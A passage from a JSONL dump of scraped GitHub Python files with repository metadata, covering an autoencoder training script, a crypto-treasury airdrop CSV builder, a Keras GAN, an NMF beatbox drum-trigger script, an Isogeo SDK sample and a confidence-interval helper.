dt.second\n\nexperiment_name = f\"{month}.{day}.{year}-{hour}.{minute}.{second}\"\n\ndef test_model(model, test_loader):\n \"\"\"\n Our own testing loop instead of using the trainer.test() method so that we\n can multithread EMD computation on the CPU\n \"\"\"\n model.eval()\n input_calQ_list = []\n output_calQ_list = []\n with torch.no_grad():\n for x in tqdm(test_loader):\n x = x.to(model.device)\n output = model(x)\n input_calQ = model.map_to_calq(x)\n output_calQ_fr = model.map_to_calq(output)\n input_calQ = torch.stack(\n [input_calQ[i] * model.val_sum[i] for i in range(len(input_calQ))]\n ) # shape = (batch_size, 48)\n output_calQ = unnormalize(\n torch.clone(output_calQ_fr), model.val_sum\n ) # ae_out\n input_calQ_list.append(input_calQ)\n output_calQ_list.append(output_calQ)\n input_calQ = np.concatenate([i_calQ.cpu() for i_calQ in input_calQ_list], axis=0)\n output_calQ = np.concatenate([o_calQ.cpu() for o_calQ in output_calQ_list], axis=0)\n start_time 
= time.time()\n with multiprocessing.Pool() as pool:\n emd_list = pool.starmap(emd, zip(input_calQ, output_calQ))\n print(f\"EMD computation time: {time.time() - start_time} seconds\")\n average_emd = np.mean(np.array(emd_list))\n print(f\"Average EMD: {average_emd}\")\n return average_emd\n\n\ndef main(args):\n if not os.path.exists(args.save_dir):\n os.makedirs(args.save_dir)\n # ------------------------\n # 0 PREPARE DATA\n # ------------------------\n data_module = AutoEncoderDataModule.from_argparse_args(args)\n data_module.train_bs = 32 # I DON'T LIKE TOO HARDCODED\n data_module.test_bs = 32 # I DON'T LIKE TOO HARDCODED\n if args.process_data:\n print(\"Processing data...\")\n data_module.process_data()\n # ------------------------\n # 1 INIT LIGHTNING MODEL\n # ------------------------\n model = AutoEncoder(\n accelerator=args.accelerator, \n quantize=args.quantize,\n precision=[\n 32, \n 32, \n 32\n ],\n learning_rate=1e-3, # I DON'T LIKE TOO HARDCODED\n econ_type=\"baseline\", # I DON'T LIKE TOO HARDCODED\n )\n\n torchinfo.summary(model, input_size=(1, 1, 8, 8)) # (B, C, H, W)\n\n tb_logger = pl_loggers.TensorBoardLogger(args.save_dir, name=experiment_name)\n\n # Stop training when model converges\n early_stop_callback = EarlyStopping(monitor=\"val_loss\", min_delta=0.00, patience=5, verbose=True, mode=\"min\")\n\n # Save top-1 checkpoints based on Val/Loss\n top1_checkpoint_callback = ModelCheckpoint(\n save_top_k=1,\n save_last=True,\n monitor=\"val_loss\",\n mode=\"min\",\n dirpath=os.path.join(args.save_dir, experiment_name),\n filename='model_best',\n auto_insert_metric_name=False,\n )\n print(f'Saving to dir: {os.path.join(args.save_dir, args.experiment_name)}')\n\n # ------------------------\n # 2 INIT TRAINER\n # ------------------------\n trainer = pl.Trainer(\n max_epochs=args.max_epochs,\n accelerator=\"auto\",\n logger=tb_logger,\n callbacks=[top1_checkpoint_callback, early_stop_callback],\n )\n\n # ------------------------\n # 3 TRAIN MODEL\n 
# ------------------------\n if args.train:\n trainer.fit(model=model, datamodule=data_module)\n\n # ------------------------\n # 4 EVALUTE MODEL\n # ------------------------\n if args.train or args.evaluate:\n if args.checkpoint or True:\n checkpoint_file = os.path.join(args.saving_folder, args.experiment_name, f'model_best.ckpt')\n print('Loading checkpoint...', checkpoint_file)\n checkpoint = torch.load(checkpoint_file)\n model.load_state_dict(checkpoint['state_dict'])\n # Need val_sum to compute EMD\n _, val_sum = data_module.get_val_max_and_sum()\n model.set_val_sum(val_sum)\n data_module.setup(\"test\")\n test_results = test_model(model, data_module.test_dataloader())\n test_results_log = os.path.join(\n args.saving_folder, args.experiment_name, args.experiment_name + f\"_emd.txt\"\n )\n with open(test_results_log, \"w\") as f:\n f.write(str(test_results))\n f.close()\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument(\"--process_data\", action=\"store_true\", default=False)\n parser.add_argument(\"--max_epochs\", type=int, default=10)\n parser.add_argument(\"--save_dir\", type=str, default=\"/data/jcampos/hawq-jet-tagging/checkpoints/econ\")\n parser.add_argument(\"--experiment_name\", type=str, default=\"autoencoder\")\n parser.add_argument(\"--fast_dev_run\", action=\"store_true\", default=False)\n parser.add_argument(\n \"--accelerator\", type=str, choices=[\"cpu\", \"gpu\", \"auto\"], default=\"auto\"\n )\n parser.add_argument(\"--checkpoint\", type=str, default=\"\", help=\"model checkpoint\")\n parser.add_argument(\"--train\", action=\"store_true\", default=False)\n parser.add_argument(\"--evaluate\", action=\"store_true\", default=False)\n parser.add_argument(\n \"--quantize\", \n action=\"store_true\", \n default=False, \n help=\"quantize model to 6-bit fixed point (1 signed bit, 1 integer bit, 4 fractional bits)\"\n )\n\n # Add dataset-specific args\n parser = AutoEncoderDataModule.add_argparse_args(parser)\n\n args 
= parser.parse_args()\n main(args)\n","repo_name":"fastmachinelearning/hawq-jet-tagging","sub_path":"training/econ/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6156,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"17367937531","text":"import pandas as pd\nfrom brownie import interface\nfrom decimal import Decimal\n\nfrom helpers.addresses import registry\n\n\ndef main():\n \"\"\"\n build a gnosis airdrop csv with all topups needing to happen for a given\n week.\n \"\"\"\n\n df = {\"token_address\": [], \"receiver\": [], \"value\": []}\n\n # https://github.com/Badger-Finance/badger-multisig/issues/293\n # add badger to the tree for weekly emissions\n week_12_badger_emissions = Decimal(\"23994.02\")\n week_12_rembadger_emissions = Decimal(\"7692.307692\")\n df[\"token_address\"].append(registry.eth.treasury_tokens.BADGER)\n df[\"receiver\"].append(registry.eth.badger_wallets.badgertree)\n df[\"value\"].append(week_12_badger_emissions + week_12_rembadger_emissions)\n\n # https://github.com/Badger-Finance/badger-multisig/issues/294\n # add badger to the tree for weekly emissions\n week_12_digg_emissions = Decimal(\"1.302461219\")\n df[\"token_address\"].append(registry.eth.treasury_tokens.DIGG)\n df[\"receiver\"].append(registry.eth.badger_wallets.badgertree)\n df[\"value\"].append(week_12_digg_emissions)\n\n # https://github.com/Badger-Finance/badger-multisig/issues/302\n # move bvecvx and related positions to treasury voter\n bvecvx_bal = interface.ISettV4h(\n registry.eth.treasury_tokens.bveCVX,\n owner=registry.eth.badger_wallets.treasury_ops_multisig,\n ).balanceOf(registry.eth.badger_wallets.treasury_ops_multisig)\n df[\"token_address\"].append(registry.eth.treasury_tokens.bveCVX)\n df[\"receiver\"].append(registry.eth.badger_wallets.treasury_voter_multisig)\n df[\"value\"].append(Decimal(bvecvx_bal) / Decimal(\"1e18\"))\n\n # turn dict of lists into dataframe and add additional 
columns needed by\n # the gnosis app\n df = pd.DataFrame(df)\n df[\"token_type\"] = \"erc20\"\n df[\"id\"] = pd.NA\n\n # build dataframe for airdrop and dump to csv\n airdrop = df[[\"token_type\", \"token_address\", \"receiver\", \"value\", \"id\"]]\n airdrop.to_csv(\n \"scripts/badger/topups/week_12.csv\",\n index=False,\n header=[\"token_type\", \"token_address\", \"receiver\", \"value\", \"id\"],\n )\n print(airdrop)\n","repo_name":"Badger-Finance/badger-multisig","sub_path":"scripts/badger/topups/week_12.py","file_name":"week_12.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"44"} +{"seq_id":"38453908725","text":"import os\nimport json\nimport requests\n\ndef get_total_page(url, path, file_name):\n print('getting total page...')\n\n json_res = requests.get(url).json()\n\n with open(os.path.join(path, file_name), 'w+') as outfile:\n json.dump(json_res, outfile)\n\n with open(os.path.join(path, file_name)) as json_file:\n json_data = json.load(json_file)\n\n total_page = json_data['total_pages']\n\n print('Done getting total page...')\n\n return total_page\n\n\ndef get_urls(url, page):\n print('getting urls... page {}'.format(page))\n\n json_res = requests.get(url).json()\n\n urls = []\n for item in json_res['items']:\n urls.append(item['link'])\n\n print('Done getting urls... 
page {}'.format(page))\n\n return urls","repo_name":"w4ndry/scraping-teralogistics","sub_path":"modules/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33438570677","text":"\n# #ფუნქციის გრაფიკი y=2\n# def route(x,y):\n# if y == 2:\n# return True\n# else:\n# return False\n \n# x = int(input(\"enter the x coordinate: \"))\n# y = int(input(\"enter the y coordinate: \"))\n\n# print(route(x, y))\n\ndef divide(arr):\n my_sum = 0\n for element in arr:\n my_sum += element\n \n return my_sum/len(arr)\n\narr = []\nammount_of_numbers = int(input(\"შეიყვანეთ რამდენი რიცხვის შეყვანა გსურთ: \"))\nfor i in range(ammount_of_numbers):\n num = int(input(\"enter num\" + str(i+1) + \":\"))\n arr.append(num)\n \nprint(divide(arr))\n\n \n\n\n\n","repo_name":"Tsertsvadze/IT-step","sub_path":"day-5/davaleba1.py","file_name":"davaleba1.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"ka","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74222406852","text":"import pyaudio\nimport librosa, librosa.display\nimport numpy as np\nimport scipy\nimport sounddevice as sd\nfrom playsound import playsound\nimport time\nfrom NMF_Function import myNMF\n\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning) \n\n# constants\nCHUNK = 256 # samples per frame\nFORMAT = pyaudio.paFloat32 # audio format (bytes per sample?)\nCHANNELS = 1 # single channel for microphone\nRATE = 44100 # samples per second\nRECORD_SEC = 2\n\n# pyaudio class instance\np = pyaudio.PyAudio()\n\n# initialize stream object\nstream = p.open(\n format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input=True,\n output=True,\n frames_per_buffer=CHUNK\n)\n\n## KICK\nframes = [] # A python-list of chunks(numpy.ndarray)\nwhile True:\n\n print('~~~~~~~~~~~~~~~~~~~~')\n print('Press Enter to begin recording Kick')\n 
input()\n\n \n time.sleep(.5)\n\n for _ in range(0, int(RATE / CHUNK * RECORD_SEC)):\n data = stream.read(CHUNK, exception_on_overflow = False)\n frames.append(np.fromstring(data, dtype=np.float32))\n\n \n playsound('record_end.wav')\n #Convert the list of numpy-arrays into a 1D array (column-wise)\n kick = np.hstack(frames)\n \n print('Playing back...')\n time.sleep(1)\n sd.play(kick, RATE)\n time.sleep(RECORD_SEC)\n sd.stop()\n\n \n check = input(\"Is this good? (Y/N)\")\n if check == 'Y':\n print('\\n')\n print('Kick recorded!')\n print('Press Enter to move onto Snare')\n print('~~~~~~~~~~~~~~~~~~~~')\n input()\n \n break\n else:\n frames = []\n print('\\n\\n')\n continue\n\n\n## SNARE\nframes = [] # A python-list of chunks(numpy.ndarray)\nwhile True:\n\n print('~~~~~~~~~~~~~~~~~~~~')\n print('Press Enter to begin recording Snare')\n input()\n\n \n time.sleep(.5)\n\n for _ in range(0, int(RATE / CHUNK * RECORD_SEC)):\n data = stream.read(CHUNK, exception_on_overflow = False)\n frames.append(np.fromstring(data, dtype=np.float32))\n\n \n\n #Convert the list of numpy-arrays into a 1D array (column-wise)\n snare = np.hstack(frames)\n playsound('record_end.wav')\n print('Playing back...')\n time.sleep(1)\n sd.play(snare, RATE)\n time.sleep(RECORD_SEC)\n sd.stop()\n\n \n check = input(\"Is this good? 
(Y/N)\")\n if check == 'Y':\n print('\\n')\n print('Snare recorded!')\n print('Press Enter to move onto Hihat')\n print('~~~~~~~~~~~~~~~~~~~~')\n\n input()\n \n break\n else:\n frames = []\n print('\\n\\n')\n continue\n\n\n\n## HIHAT\nframes = [] # A python-list of chunks(numpy.ndarray)\nwhile True:\n\n print('~~~~~~~~~~~~~~~~~~~~')\n print('Press Enter to begin recording Hihat')\n input()\n\n \n time.sleep(.5)\n\n for _ in range(0, int(RATE / CHUNK * RECORD_SEC)):\n data = stream.read(CHUNK, exception_on_overflow = False)\n frames.append(np.fromstring(data, dtype=np.float32))\n\n\n #Convert the list of numpy-arrays into a 1D array (column-wise)\n hihat = np.hstack(frames)\n playsound('record_end.wav')\n print('Playing back...')\n time.sleep(1)\n sd.play(hihat, RATE)\n time.sleep(RECORD_SEC)\n sd.stop()\n\n \n check = input(\"Is this good? (Y/N)\")\n if check == 'Y':\n print('\\n')\n print('Hihat recorded!')\n print('Press Enter to complete recording')\n print('~~~~~~~~~~~~~~~~~~~~')\n input()\n \n break\n else:\n frames = []\n print('\\n\\n')\n continue\n\nprint('Recording Samples')\n\nframes = [] # A python-list of chunks(numpy.ndarray)\nwhile True:\n\n print('~~~~~~~~~~~~~~~~~~~~')\n print('Press Enter to begin recording Beatboxing')\n input()\n\n \n time.sleep(.5)\n\n for _ in range(0, int(RATE / CHUNK * 10)):\n data = stream.read(CHUNK, exception_on_overflow = False)\n frames.append(np.fromstring(data, dtype=np.float32))\n\n \n playsound('record_end.wav')\n #Convert the list of numpy-arrays into a 1D array (column-wise)\n recording = np.hstack(frames)\n \n print('Playing back...')\n time.sleep(1)\n sd.play(recording, RATE)\n time.sleep(10)\n sd.stop()\n\n \n check = input(\"Is this good? 
(Y/N)\")\n if check == 'Y':\n print('\\n')\n print('Beatboxing recorded!')\n \n break\n else:\n frames = []\n print('\\n\\n')\n continue\n\n# close stream\nstream.stop_stream()\nstream.close()\n\np.terminate()\n\n\n# STFT Parameters\nfftlen = 1024\nhopsize = 256\n\n# Training the dictionary components\nprint(\"Training Dictionary\")\n\nW = np.zeros((513,3)) # Dictionary Matrix\n\n# Calculate the spectrogram\nS = librosa.stft(kick,hop_length=hopsize,win_length=fftlen, window='hamming', n_fft=fftlen)\nS_mag, S_phase = librosa.magphase(S)\nS_db = librosa.amplitude_to_db(S_mag)\n\n# NMF Parameters\nr = 1\nnIter = 75\n\n[W_temp,H,KL] = myNMF(S_mag,r,nIter) # Process the Dictionary Matrix\nW[:,0] = W_temp[:,0]\n\nprint(f'Component 0 Trained')\n\n\n# Calculate the spectrogram\nS = librosa.stft(snare,hop_length=hopsize,win_length=fftlen, window='hamming', n_fft=fftlen)\nS_mag, S_phase = librosa.magphase(S)\nS_db = librosa.amplitude_to_db(S_mag)\n\n# NMF Parameters\nr = 1\nnIter = 75\n\n[W_temp,H,KL] = myNMF(S_mag,r,nIter) # Process the Dictionary Matrix\nW[:,1] = W_temp[:,0]\n\nprint(f'Component 1 Trained')\n\n\n# Calculate the spectrogram\nS = librosa.stft(hihat,hop_length=hopsize,win_length=fftlen, window='hamming', n_fft=fftlen)\nS_mag, S_phase = librosa.magphase(S)\nS_db = librosa.amplitude_to_db(S_mag)\n\n# NMF Parameters\nr = 1\nnIter = 75\n\n[W_temp,H,KL] = myNMF(S_mag,r,nIter) # Process the Dictionary Matrix\nW[:,2] = W_temp[:,0]\n\nprint(f'Component 2 Trained')\n\n\n\n# Loading in Test Audio File\nx = recording\n\n# Calculating the spectrogram of the audio file\nS = librosa.stft(x,hop_length=hopsize,win_length=fftlen, window='hamming', n_fft=fftlen)\nS_mag, S_phase = librosa.magphase(S)\nS_db = librosa.amplitude_to_db(S_mag)\n\n# NMF Parameters\nr = 3\nnIter = 75\n\n[_,H,KL] = myNMF(S_mag,r,nIter,bUpdateW=0,initW=W) # Processing the audio file\nprint(\"NMF Completed\")\n\n\nnumframes = np.floor(x.size/hopsize).astype(int) # calculating the number of total 
frames\n\nlocalmax = np.zeros((3,100), dtype= int) # Variable for the local maxima of each component's activation matrix\n\nfor n in range(r):\n\n H[n,:] *= 1.0 / (H[n,:].max()) # Normalization\n\n maxima, _ = scipy.signal.find_peaks(H[n,:], height=0.2, distance=18) # Finding local maxima\n localmax[n, 0:len(maxima)] = maxima\n \n# Organizing and sorting local maxima into one array\nmaximas = np.concatenate([localmax[0],localmax[1],localmax[2]])\nmaximas = maximas[maximas != 0]\nmaximas = np.sort(maximas)\n\n# Detecting and processing duplicate or false maxima detection\nfor i in range(0,len(maximas)-1):\n\n # If any successive maxima are within a certain distance\n if(maximas[i+1] <= maximas[i] + 10): \n try:\n idx1 = np.where(localmax == maximas[i])[0][0]\n except:\n\n idx1 = 0\n try:\n idx2 = np.where(localmax == maximas[i+1])[0][0]\n except:\n idx2 = 0\n \n\n # Check which maxima has a higher magnitude and delete the other false maxima\n if(H[idx1,maximas[i]] > H[idx2,maximas[i+1]]):\n localmax[idx2, np.where(localmax[idx2] == maximas[i+1])[0]] = 0\n else:\n localmax[idx1,np.where(localmax[idx1] == maximas[i])[0]] = 0\n\n\n\n# Arrays for finding final triggers\ntriggers = np.zeros((3,numframes),dtype=int)\ntemps = np.zeros((3,100), dtype= int) \n\nfor n in range(r):\n\n max = localmax[n][localmax[n] != 0] # Find all maxima not equal to 0\n temps[n, 0:len(max)] = max # Load into temp array\n\n for i in range(numframes): # Set impulse at maxima location\n if(i in max):\n triggers[n,i] = 1\n\n\nsnare, _ = librosa.load(\"Fakie Flip Snare.wav\", sr=None) # Loading in audio file\nkick, _ = librosa.load(\"Nollie Kick.wav\", sr=None) # Loading in audio file\nhihat, _ = librosa.load(\"Heel Flip Hat.wav\", sr=None) # Loading in audio file\n\n\n\ntriggers_interp = np.zeros((3,len(triggers[0]) + (len(triggers[0])-1)*(255))) # Reconstructing the output through interpolation\nfor n in range(3):\n triggers_interp[n][::256] = triggers[n]\n\nout = 
np.zeros(len(triggers_interp[0]) + RATE * RECORD_SEC) # Output with a buffer at the end for audio recording\n\n# Check for trigger and load corresponding audio sample\nfor samp in range(len(triggers_interp[0])):\n if(triggers_interp[1,samp] == 1):\n out[samp:len(snare)+samp] = snare\n elif(triggers_interp[0,samp] == 1):\n out[samp:len(kick)+samp] = kick\n elif(triggers_interp[2,samp] == 1):\n out[samp:len(hihat)+samp] = hihat\n\nif(x.size < out.size): # Match lengths of audio signals\n out = out[0:len(x)]\n\nprint(\"Playing Audio\")\n\nwhile True: # Play output \n \n sd.play(out+x, RATE)\n time.sleep(len(out)/RATE)\n sd.stop()\n\n check = input(\"Is this good? (Y/N)\")\n if check == 'Y':\n input()\n break","repo_name":"nmill15/ECE_477_FinalProject","sub_path":"477Final.py","file_name":"477Final.py","file_ext":"py","file_size_in_byte":9016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"15441214449","text":"# -*- coding: UTF-8 -*-\n#! 
python3 # noqa E265\n\n\"\"\"\n Isogeo sample - Check if OpenCatalog exists in shares, then build a matching table between metadata and opencatalog URL\n\n To use it from the repository root:\n\n `python ./isogeo_pysdk/samples/get_OpenCatalog.py`\n\"\"\"\n\n# ##############################################################################\n# ########## Libraries #############\n# ##################################\n\n# standard\nimport logging\n\n# Isogeo\nfrom isogeo_pysdk import Isogeo, Share\n\n# ##############################################################################\n# ##### Stand alone program ########\n# ##################################\nif __name__ == \"__main__\":\n \"\"\"Standalone execution.\"\"\"\n # standard\n from os import environ\n\n # 3rd party\n from dotenv import load_dotenv\n import urllib3\n\n logger = logging.getLogger()\n log_console_handler = logging.StreamHandler()\n log_console_handler.setLevel(logging.DEBUG)\n logger.addHandler(log_console_handler)\n\n # get user ID as environment variables\n load_dotenv(\"prod.env\")\n\n # ignore warnings related to the QA self-signed cert\n if environ.get(\"ISOGEO_PLATFORM\").lower() == \"qa\":\n urllib3.disable_warnings()\n\n # for oAuth2 Backend (Client Credentials Grant) Flow\n isogeo = Isogeo(\n auth_mode=\"group\",\n client_id=environ.get(\"ISOGEO_API_GROUP_CLIENT_ID\"),\n client_secret=environ.get(\"ISOGEO_API_GROUP_CLIENT_SECRET\"),\n auto_refresh_url=\"{}/oauth/token\".format(environ.get(\"ISOGEO_ID_URL\")),\n platform=environ.get(\"ISOGEO_PLATFORM\", \"qa\"),\n )\n\n # getting a token\n isogeo.connect()\n\n # Check OpenCatalog URLS\n print(\n \"This application is authenticated as {} and supplied by {} shares.\".format(\n isogeo.app_properties.name, len(isogeo._shares)\n )\n )\n\n for s in isogeo._shares:\n share = Share(**s)\n print(\n \"\\nShare {} owned by {}\".format(\n share.name, share._creator.get(\"contact\").get(\"name\")\n )\n )\n\n # OpenCatalog status\n opencatalog_url = 
share.opencatalog_url(isogeo.oc_url)\n if isogeo.head(opencatalog_url):\n print(\"OpenCatalog available at: {}\".format(opencatalog_url))\n else:\n print(\n \"OpenCatalog not enabled yet. Go to the administration to add it: {}\".format(\n share.admin_url(isogeo.app_url)\n )\n )\n\n # get metadata present into the share\n share_mds = isogeo.search(whole_results=1, share=share._id)\n print(\"{} metadata are available through this share.\".format(share_mds.total))\n\n # closing the connection\n isogeo.close()\n","repo_name":"isogeo/isogeo-api-py-minsdk","sub_path":"isogeo_pysdk/samples/get_OpenCatalog.py","file_name":"get_OpenCatalog.py","file_ext":"py","file_size_in_byte":2741,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"15902051623","text":"import toolkit\nfrom pandas import HDFStore\nimport suite\n\nc1 = suite.Combo1()\nc1.date_selector = toolkit.DateSelector('2018-01-02', '2018-05-10')\n\nboot = toolkit.Bootup()\nhdf = HDFStore(boot.data_read_only_file)\ndf = hdf['ADSK']\nprint(df.shape)\n\ntoolkit.add_analysis_data(df)\n\nfor i, row in df.iterrows():\n print(i)\n print(c1.query(i, row))\n","repo_name":"GaryBian/rs","sub_path":"src/selectortest2.py","file_name":"selectortest2.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"36276143905","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[32]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom keras.datasets import mnist\nfrom keras.layers import Dense, Flatten, Reshape\nfrom keras.layers.advanced_activations import LeakyReLU\nfrom keras.models import Sequential\nfrom keras.optimizers import Adam\n\n\n# In[33]:\n\n\nimg_rows = 28\nimg_cols = 28\nchannels = 1\n\n# 入力画像の次元\nimg_shape = (img_rows, img_cols, channels)\n\n# 生成器の入力として使われるノイズベクトルの次元\nz_dim = 100\n\n\n# ## 
生成器のモデル\n\n# In[34]:\n\n\ndef build_generator(img_shape, z_dim):\n \n model = Sequential()\n \n # 全結合層\n model.add(Dense(128, input_dim=z_dim))\n \n # Leaky ReLUによる活性化\n model.add(LeakyReLU(alpha=0.01))\n \n # tanh関数による出力層\n model.add(Dense(28 * 28 * 1, activation='tanh'))\n \n # 生成器の出力が画像サイズになるようにreshapeする\n model.add(Reshape(img_shape))\n \n return model\n\n\n# ## 識別器のモデル\n\n# In[35]:\n\n\ndef build_discriminator(img_shape):\n \n model = Sequential()\n \n # 入力画像を一列に並べる\n model.add(Flatten(input_shape=img_shape))\n \n # 全結合層\n model.add(Dense(128))\n \n # Leaky ReLUによる活性化\n model.add(LeakyReLU(alpha=0.01))\n \n # sigmoid関数を通して出力する\n model.add(Dense(1, activation='sigmoid'))\n \n return model\n\n\n# ## GANの構築とコンパイル\n\n# In[38]:\n\n\ndef build_gan(generator, discriminator):\n \n model = Sequential()\n \n # 生成器と識別器の結合\n model.add(generator)\n model.add(discriminator)\n \n return model\n# 識別器の構築とコンパイル\ndiscriminator = build_discriminator(img_shape)\n\n# 生成器の構築中は識別器のパラメータを固定\ndiscriminator.compile(loss='binary_crossentropy',\n optimizer=Adam(),\n metrics=['accuracy'])\n\n# 生成器の構築\ngenerator = build_generator(img_shape, z_dim)\n\n# 生成器の構築中は識別器のパラメータを固定する\ndiscriminator.tranable = False\n\n# 生成器の訓練のため、識別器は固定し、GANモデルの構築とコンパイルを行う\ngan = build_gan(generator, discriminator)\ngan.compile(loss='binary_crossentropy', optimizer=Adam())\n\n\n# ## GANの訓練ループ\n\n# In[39]:\n\n\n## GANの訓練ループ\nlosses = []\naccuracies = []\niteration_checkpoints = []\n\ndef train(iterations, batch_size, sample_interval):\n \n # MNISTデータセットのロード\n (X_train, _), (_, _) = mnist.load_data()\n \n # [0,255]の範囲のグレースケールがそちを[-1, 1]にスケーリング\n X_train = X_train / 127.5 - 1.0\n X_train = np.expand_dims(X_train, axis=3)\n \n # 本物の画像のラベルは全て1とする\n real = np.ones((batch_size, 1))\n \n # 偽の画像のラベルは全て0とする\n fake = np.zeros((batch_size, 1))\n \n for iteration in range(iterations):\n \n # -------------------\n # 識別器の訓練\n # -------------------\n \n # 本物の画像のランダムに取り出したバッチを作る\n idx = np.random.randint(0, X_train.shape[0], 
batch_size)\n imgs = X_train[idx]\n \n #偽の画像のランダムに取り出したバッチを生成する\n z = np.random.normal(0, 1, (batch_size, 100))\n gen_imgs = generator.predict(z)\n \n # 識別器の訓練\n d_loss_real = discriminator.train_on_batch(imgs, real)\n d_loss_fake = discriminator.train_on_batch(gen_imgs, fake)\n d_loss, accuracy = 0.5 * np.add(d_loss_real, d_loss_fake)\n \n # -----------------\n # 生成器の訓練\n # -----------------\n \n # 偽の画像のバッチを生成する\n z = np.random.normal(0, 1, (batch_size, 100))\n gen_imgs = generator.predict(z)\n \n # 生成器の訓練\n g_loss = gan.train_on_batch(z, real)\n \n if (iteration + 1) % sample_interval == 0:\n \n # 訓練終了後に図時するために、損失を精度をセーブしておく\n losses.append((d_loss, g_loss))\n accuracies.append(100.0 * accuracy)\n iteration_checkpoints.append(iteration + 1)\n \n # 訓練の進捗を出力する\n print(\"%d [D loss: %f, acc.: %.2f%%] [G loss: %f]\" %\n (iteration + 1, d_loss, 100.0 * accuracy, g_loss))\n \n # 生成された画像のサンプルを出力する\n sample_images(generator)\n\n\n# ## 生成された画像の表示\n\n# In[44]:\n\n\ndef sample_images(generator, image_grid_rows=4, image_grid_columns=4):\n\n # Sample random noise\n z = np.random.normal(0, 1, (image_grid_rows * image_grid_columns, z_dim))\n\n # Generate images from random noise\n gen_imgs = generator.predict(z)\n\n # Rescale image pixel values to [0, 1]\n gen_imgs = 0.5 * gen_imgs + 0.5\n\n # Set image grid\n fig, axs = plt.subplots(image_grid_rows,\n image_grid_columns,\n figsize=(4, 4),\n sharey=True,\n sharex=True)\n\n cnt = 0\n for i in range(image_grid_rows):\n for j in range(image_grid_columns):\n # Output a grid of images\n axs[i, j].imshow(gen_imgs[cnt, :, :, 0], cmap='gray')\n axs[i, j].axis('off')\n cnt += 1\n\n\n# ## モデルを実行する\n\n# In[45]:\n\n\n# ハイパーパラメータの設定\niterations = 20000\nbatch_size = 128\nsample_interval = 1000\n\n# 設定した反復回数だけGANの訓練を行う\ntrain(iterations, batch_size, sample_interval)\n\n\n# In[ 
]:\n\n\n\n\n","repo_name":"takerumimata/GANGAN-gashuku","sub_path":"gangan.py","file_name":"gangan.py","file_ext":"py","file_size_in_byte":5857,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"38511870239","text":"from typing import Callable, Text, Tuple\r\n\r\nimport pandas as pd\r\nfrom numpy import nanmean\r\nfrom scipy.stats import bootstrap, sem, t\r\n\r\n\r\ndef calculate_t_ci(\r\n function_to_ci: Callable,\r\n data_to_ci: pd.Series,\r\n ci_level: float\r\n):\r\n \"\"\"\r\n Used to calculate the t distribution based\r\n confidence interval.\r\n It's called in confidence_interval_calculation function.\r\n Args:\r\n function_to_ci: Callable\r\n data_to_ci: pd.Series\r\n ci_level: float\r\n\r\n Returns:\r\n low_ci: float\r\n high_ci: float\r\n\r\n \"\"\"\r\n\r\n data_to_ci = data_to_ci.to_list()\r\n parameter_to_ci = function_to_ci(data_to_ci)\r\n standard_error = sem(data_to_ci, nan_policy=\"omit\")\r\n ci = standard_error * t.ppf((1 + ci_level) / 2., len(data_to_ci) - 1)\r\n low_ci = parameter_to_ci - ci\r\n\r\n high_ci = parameter_to_ci + ci\r\n return low_ci, high_ci\r\n\r\n\r\ndef confidence_interval_calculation(\r\n to_ci: pd.DataFrame,\r\n stage_device_name: Text,\r\n function_to_ci: Callable = nanmean,\r\n return_annot_df: bool = False,\r\n ci_level: float = 0.95,\r\n digit: int = 2,\r\n ci_bootstrapping: bool = False,\r\n boot_method: Text = \"basic\",\r\n boot_n_resamples: int = 100000\r\n) -> Tuple:\r\n\r\n \"\"\"\r\n Calculates the confidence interval (ci for short).\r\n It allows to calculate the ci in different\r\n methods.\r\n\r\n Args:\r\n to_ci: pd.DataFrame\r\n Dataframe to confidence interval\r\n stage_device_name: Text\r\n Stage or device on which data the ci is calculated.\r\n Argument named after the fact that in bland-altman functions,\r\n the CI is calculated on single device, while in performance\r\n metrics the function is applied to every single sleep stage.\r\n 
function_to_ci: Callable\r\n callable of moment.\r\n The default is nanmean.\r\n return_annot_df: bool\r\n if true, the function returns a Tuple\r\n having as first element the ci as float,\r\n and as second element the ci formatted as\r\n string. The DataFrame formatted as string\r\n is passed to annot argument in seaborn heatmap\r\n functions.\r\n if false, only the ci interval as float is returned.\r\n The default is False.\r\n ci_level: float\r\n lambda (confidence level) for ci.\r\n The default is 0.95.\r\n digit: int\r\n digit for rounding.\r\n The default is 2.\r\n ci_bootstrapping: bool\r\n if True, ci is calculated through bootstrapping.\r\n The default is False\r\n boot_method: Text\r\n type of bootstrapping applied.\r\n Supported: 'percentile', 'basic', 'BCa'.\r\n The default is 'basic'.\r\n boot_n_resamples: int\r\n number of resamples for bootstrapping.\r\n Ignored if ci_boostrapping is false.\r\n The default is 10,000.\r\n\r\n Returns:\r\n ci_output: pd.DataFrame\r\n see return_annot_df in Args for further\r\n details on output.\r\n\r\n \"\"\"\r\n if ci_bootstrapping is False:\r\n\r\n ci = to_ci.apply(\r\n lambda x: calculate_t_ci(\r\n function_to_ci=function_to_ci,\r\n data_to_ci=x,\r\n ci_level=ci_level\r\n ),\r\n axis=0\r\n ).transpose()\r\n ci.columns = ['lower_ci', 'upper_ci']\r\n\r\n else:\r\n ci = list(\r\n map(\r\n lambda x:\r\n (x[0],\r\n bootstrap(\r\n data=[x[1]],\r\n 